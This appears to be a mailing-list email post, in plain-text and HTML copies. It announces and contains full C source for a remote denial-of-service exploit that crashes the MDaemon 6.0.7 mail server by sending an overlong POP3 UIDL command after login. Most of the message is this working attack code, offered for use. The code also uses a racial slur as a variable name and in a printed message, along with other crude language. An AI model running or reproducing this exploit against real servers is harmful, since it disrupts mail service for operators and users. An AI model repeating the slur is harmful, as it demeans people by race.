------=_NextPart_001_01B9_01C282B0.704350F0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,
Description: MDaemon 6.0.7 Remote DoS Exploit.  Overflows the UIDL bug.
Exploit code tested to run on Redhat8 and FreeBSD 4.7-STABLE.
Requires POP3 account on vulnerable daemon.  Sends the overflow string
and crashes MDaemon. http://www.division7.us support@division7.us

Code included and attached d7-mdaemonx.c

START CODE

---snip d7-mdaemonx.c----

/*

* MDaemonX DoS Exploit

* MDaemon is a popular Win32 based, SMTP, POP, IMAP Server

* Crashes MDaemon 6.0.7 < With UIDL Overflow String

* Coded by Division 7 Security Systems

* http://www.division7.us

* pHrail, smurf, elu1d=20

* support@division7.us=20

* Tested to work on Redhat8.0 and FreeBSD 4.7-STABLE=20

* TeKn|CaL j00 were own3d by this, do not DENY!

*/

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <errno.h>

#include <string.h>

#include <netdb.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>







#define MAXDATASIZE 100 // max number of bytes we can get at once=20



void usage(char *program){

printf("[<$>] MDaemon - DOS Attack - Ported for FreeBSD and Linux\n");

printf("[<$>] Coded by division7\n");

printf("[<$>] pHrail, smurfy, elu1d\n");

printf("[<$>] Usage: %s <host> <username> <password> <port>\n", =
program);

printf("[<$>] Note: port 110 is default if port is not specified\n");

}







int main(int argc, char *argv[])

{

int sockfd, numbytes, i, port, nigger;=20


char buf[MAXDATASIZE];

char user[256];

char pass[256];=20

char uidl[256]=3D"UIDL 11111111111111111111111111111111\n\0";

struct hostent *he;

struct sockaddr_in their_addr; // connector's address information=20

if(argc < 4){

usage(argv[0]);

exit(0);

}




if (argv[4] =3D=3D NULL) {

port =3D 110;

} else {

port =3D atoi(argv[4]);

}









if ((he=3Dgethostbyname(argv[1])) =3D=3D NULL) { // get the host info=20

perror("gethostbyname");

exit(1);

}

if ((sockfd =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) {

perror("socket");

exit(1);

}

their_addr.sin_family =3D AF_INET; // host byte order=20

their_addr.sin_port =3D htons(port); // short, network byte order=20

their_addr.sin_addr =3D *((struct in_addr *)he->h_addr);

memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct=20

if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct =
sockaddr)) =3D=3D -1) {

printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);

}

sprintf(user,"USER %s\n",argv[2]);

sprintf(pass,"PASS %s\n",argv[3]);=20


nigger =3D strlen(pass) - 5;=20



printf("User: %s\n", argv[2]);

printf("Pass: ");

for(i =3D 1; i < nigger; i++)

{

printf("*");

}

printf("\n");=20

printf("Host: %s\n", argv[1]);

printf("Port: %lu\n", port);


if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

perror("recv");

exit(1);

}


buf[numbytes] =3D '\0';=20

printf("Received: %s",buf);

write(sockfd, user, strlen(user));

if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

perror("recv");

exit(1);

}

/*memset(buf,'\0',sizeof(buf));*/

buf[numbytes] =3D '\0';

printf("Received: %s",buf);

sleep(1);

write(sockfd, pass, strlen(pass));

if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

perror("recv");

exit(1);

}

/*memset(buf,'\0',sizeof(buf));*/

buf[numbytes] =3D '\0';

printf("Received: %s",buf);

sleep(1);

printf("Logged In...Now blowing this bitch up...\n");

write(sockfd, uidl, strlen(uidl));

printf("Nigger attack complete...sleeping and exiting...\n");=20

sleep(5);

close(sockfd);

return 0;

}



---EOF----

------=_NextPart_001_01B9_01C282B0.704350F0
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Hi,</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Description: MDaemon 6.0.7 Remote DoS=20
Exploit.&nbsp; Overflows the UIDL bug.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Exploit code tested to run on Redhat8 =
and FreeBSD=20
4.7-STABLE.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Requires POP3 account on vulnerable =
daemon.&nbsp;=20
Sends the overflow string</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>and crashes MDaemon. <A=20
href=3D"http://www.division7.us">http://www.division7.us</A> <A=20
href=3D"mailto:support@division7.us">support@division7.us</A></FONT></DIV=
>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Code included and attached=20
d7-mdaemonx.c</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>START CODE</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>---snip d7-mdaemonx.c----</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT size=3D2>
<P>/*</P>
<P>* MDaemonX DoS Exploit</P>
<P>* MDaemon is a popular Win32 based, SMTP, POP, IMAP Server</P>
<P>* Crashes MDaemon 6.0.7 < With UIDL Overflow String</P>
<P>* Coded by Division 7 Security Systems</P>
<P>* http://www.division7.us</P>
<P>* pHrail, smurf, elu1d </P>
<P>* support@division7.us </P>
<P>* Tested to work on Redhat8.0 and FreeBSD 4.7-STABLE </P>
<P>* TeKn|CaL j00 were own3d by this, do not DENY!</P>
<P>*/</P>
<P>#include <stdio.h></P>
<P>#include <stdlib.h></P>
<P>#include <unistd.h></P>
<P>#include <errno.h></P>
<P>#include <string.h></P>
<P>#include <netdb.h></P>
<P>#include <sys/types.h></P>
<P>#include <netinet/in.h></P>
<P>#include <sys/socket.h></P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>#define MAXDATASIZE 100 // max number of bytes we can get at once =
</P>
<P>&nbsp;</P>
<P>void usage(char *program){</P>
<P>printf("[<$>] MDaemon - DOS Attack - Ported for FreeBSD and=20
Linux\n");</P>
<P>printf("[<$>] Coded by division7\n");</P>
<P>printf("[<$>] pHrail, smurfy, elu1d\n");</P>
<P>printf("[<$>] Usage: %s <host> <username> =
<password>=20
<port>\n", program);</P>
<P>printf("[<$>] Note: port 110 is default if port is not=20
specified\n");</P>
<P>}</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>int main(int argc, char *argv[])</P>
<P>{</P>
<P>int sockfd, numbytes, i, port, nigger; </P>
<P></P>
<P>char buf[MAXDATASIZE];</P>
<P>char user[256];</P>
<P>char pass[256]; </P>
<P>char uidl[256]=3D"UIDL 11111111111111111111111111111111\n\0";</P>
<P>struct hostent *he;</P>
<P>struct sockaddr_in their_addr; // connector's address information =
</P>
<P>if(argc < 4){</P>
<P>usage(argv[0]);</P>
<P>exit(0);</P>
<P>}</P>
<P></P>
<P>&nbsp;</P>
<P>if (argv[4] =3D=3D NULL) {</P>
<P>port =3D 110;</P>
<P>} else {</P>
<P>port =3D atoi(argv[4]);</P>
<P>}</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>if ((he=3Dgethostbyname(argv[1])) =3D=3D NULL) { // get the host info =
</P>
<P>perror("gethostbyname");</P>
<P>exit(1);</P>
<P>}</P>
<P>if ((sockfd =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) {</P>
<P>perror("socket");</P>
<P>exit(1);</P>
<P>}</P>
<P>their_addr.sin_family =3D AF_INET; // host byte order </P>
<P>their_addr.sin_port =3D htons(port); // short, network byte order =
</P>
<P>their_addr.sin_addr =3D *((struct in_addr *)he->h_addr);</P>
<P>memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the =
struct=20
</P>
<P>if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct =

sockaddr)) =3D=3D -1) {</P>
<P>printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);</P>
<P>exit(1);</P>
<P>}</P>
<P>sprintf(user,"USER %s\n",argv[2]);</P>
<P>sprintf(pass,"PASS %s\n",argv[3]); </P>
<P></P>
<P>nigger =3D strlen(pass) - 5; </P>
<P>&nbsp;</P>
<P>printf("User: %s\n", argv[2]);</P>
<P>printf("Pass: ");</P>
<P>for(i =3D 1; i < nigger; i++)</P>
<P>{</P>
<P>printf("*");</P>
<P>}</P>
<P>printf("\n"); </P>
<P>printf("Host: %s\n", argv[1]);</P>
<P>printf("Port: %lu\n", port);</P>
<P></P>
<P>if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {</P>
<P>perror("recv");</P>
<P>exit(1);</P>
<P>}</P>
<P></P>
<P>buf[numbytes] =3D '\0'; </P>
<P>printf("Received: %s",buf);</P>
<P>write(sockfd, user, strlen(user));</P>
<P>if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {</P>
<P>perror("recv");</P>
<P>exit(1);</P>
<P>}</P>
<P>/*memset(buf,'\0',sizeof(buf));*/</P>
<P>buf[numbytes] =3D '\0';</P>
<P>printf("Received: %s",buf);</P>
<P>sleep(1);</P>
<P>write(sockfd, pass, strlen(pass));</P>
<P>if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {</P>
<P>perror("recv");</P>
<P>exit(1);</P>
<P>}</P>
<P>/*memset(buf,'\0',sizeof(buf));*/</P>
<P>buf[numbytes] =3D '\0';</P>
<P>printf("Received: %s",buf);</P>
<P>sleep(1);</P>
<P>printf("Logged In...Now blowing this bitch up...\n");</P>
<P>write(sockfd, uidl, strlen(uidl));</P>
<P>printf("Nigger attack complete...sleeping and exiting...\n"); </P>
<P>sleep(5);</P>
<P>close(sockfd);</P>
<P>return 0;</P>
<P>}</P>
<P>&nbsp;</P>
<P><FONT face=3DArial>---EOF----</FONT></P></FONT></DIV></BODY></HTML>

------=_NextPart_001_01B9_01C282B0.704350F0--